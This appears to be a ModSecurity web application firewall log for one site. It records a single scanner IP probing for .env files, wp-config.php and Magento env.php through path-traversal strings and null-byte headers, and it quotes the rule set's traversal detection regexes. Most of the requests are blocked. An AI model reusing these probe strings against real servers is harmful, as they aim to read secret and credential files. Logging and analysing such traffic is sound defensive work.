[Tue May 12 06:16:15.996071 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:65232] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjxs7kySIUZ3ORnI1MgAAAQk"]
[Tue May 12 06:16:15.996105 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:65232] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjxs7kySIUZ3ORnI1MgAAAQk"]
[Tue May 12 06:16:15.996694 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:65232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpjxs7kySIUZ3ORnI1MgAAAQk"]
[Tue May 12 06:16:16.024388 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:65214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKpkAgpmE1yW0glLdg8RwAAAMY"]
[Tue May 12 06:16:16.024623 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:65214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.backup"] [unique_id "agKpkAgpmE1yW0glLdg8RwAAAMY"]
[Tue May 12 06:16:16.242343 2026] [security2:error] [pid 1844863:tid 1844875] [client 45.148.10.166:65152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpjPaAnTZtx1_H_wzF_wAAAUY"]
[Tue May 12 06:16:16.968990 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
[Tue May 12 06:16:17.449492 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.166:64966] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpiPaAnTZtx1_H_wzF-QAAAUs"]
[Tue May 12 06:16:17.460564 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.166:35976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphvaAnTZtx1_H_wzF7QAAAUk"]
[Tue May 12 06:16:17.476156 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.166:33172] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpkfaAnTZtx1_H_wzGEAAAAVc"]
[Tue May 12 06:16:17.476244 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.166:33172] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpkfaAnTZtx1_H_wzGEAAAAVc"]
[Tue May 12 06:16:17.476409 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.166:33172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpkfaAnTZtx1_H_wzGEAAAAVc"]
[Tue May 12 06:16:18.148315 2026] [security2:error] [pid 1808852:tid 1808872] [client 45.148.10.166:35934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphBfeipD4uoG21Fo_oQAAABE"]
[Tue May 12 06:16:18.863877 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:64964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphwgpmE1yW0glLdg8MwAAAMw"]
[Tue May 12 06:16:18.891961 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.166:65168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpjM1tk6y7yBJLpJpE5QAAAI4"]
[Tue May 12 06:16:19.051215 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:65072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpjBs7kySIUZ3ORnI1JgAAAQA"]
[Tue May 12 06:16:19.294010 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:19.294070 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:19.294099 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:19.294307 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:19.294367 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:19.294403 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:19.294830 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:33220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/health"] [unique_id "agKpk_aAnTZtx1_H_wzGEgAAAVI"]
[Tue May 12 06:16:19.303075 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKpkxfeipD4uoG21Fo_vwAAAAI"]
[Tue May 12 06:16:19.303283 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.dev"] [unique_id "agKpkxfeipD4uoG21Fo_vwAAAAI"]
[Tue May 12 06:16:19.951090 2026] [security2:error] [pid 1820198:tid 1820204] [client 43.159.143.139:50308] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKpk81tk6y7yBJLpJpE8wAAAIQ"], referer: https://www.tct-telecom.fr/
[Tue May 12 06:16:20.025149 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.166:65214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpkAgpmE1yW0glLdg8RwAAAMY"]
[Tue May 12 06:16:20.511599 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:65222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpj81tk6y7yBJLpJpE8AAAAIs"]
[Tue May 12 06:16:20.514351 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.166:65130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpjggpmE1yW0glLdg8QwAAANI"]
[Tue May 12 06:16:20.544650 2026] [security2:error] [pid 1842385:tid 1842403] [client 45.148.10.166:64938] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphxs7kySIUZ3ORnI1GgAAAQ0"]
[Tue May 12 06:16:20.549143 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKplM1tk6y7yBJLpJpE9AAAAJY"]
[Tue May 12 06:16:20.549365 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:33238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKplM1tk6y7yBJLpJpE9AAAAJY"]
[Tue May 12 06:16:20.625255 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:35954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphhfeipD4uoG21Fo_pAAAAA8"]
[Tue May 12 06:16:21.209014 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.166:33172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpkfaAnTZtx1_H_wzGEAAAAVc"]
[Tue May 12 06:16:21.236483 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:65232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpjxs7kySIUZ3ORnI1MgAAAQk"]
[Tue May 12 06:16:22.232289 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpkxfeipD4uoG21Fo_vwAAAAI"]
[Tue May 12 06:16:22.257043 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKplhfeipD4uoG21Fo_wwAAAAI"]
[Tue May 12 06:16:22.257248 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.166:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKplhfeipD4uoG21Fo_wwAAAAI"]
